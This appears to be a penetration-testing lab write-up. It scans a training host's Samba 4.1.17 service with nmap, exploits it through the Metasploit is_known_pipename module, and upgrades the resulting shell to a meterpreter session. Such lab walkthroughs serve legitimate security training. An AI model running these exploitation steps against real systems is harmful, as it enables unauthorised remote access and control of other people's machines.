In this lab environment, you will be provided with GUI access to a Kali machine. The target machine running a vulnerable service will be accessible at demo.ine.local.
Objective: Exploit the vulnerable service using suitable Metasploit module and then upgrade the command shell session to a meterpreter session.
Tools
The best tools for this lab are:
Nmap
Metasploit Framework
Writeup
nmap -sSVC demo.ine.local
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.1.17 (workgroup: WORKGROUP)
MAC Address: 02:42:C0:9A:73:03 (Unknown)
Service Info: Host: DEMO
Host script results:
| smb2-time:
| date: 2025-06-09T17:37:17
|_ start_date: N/A
| smb-os-discovery:
| OS: Unix (Samba 4.1.17)
| Computer name: demo
| NetBIOS computer name: DEMO\x00
| Domain name: ine.local
| FQDN: demo.ine.local
|_ System time: 2025-06-09T17:37:14+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:0:0:
|_ Message signing enabled but not required
msfconsole
use exploit/linux/samba/is_known_pipename
set rhosts demo.ine.local
run
Ctrl + Z
sessions -i
use post/multi/manage/shell_to_meterpreter
set session 2
set lhost 192.154.115.2
run
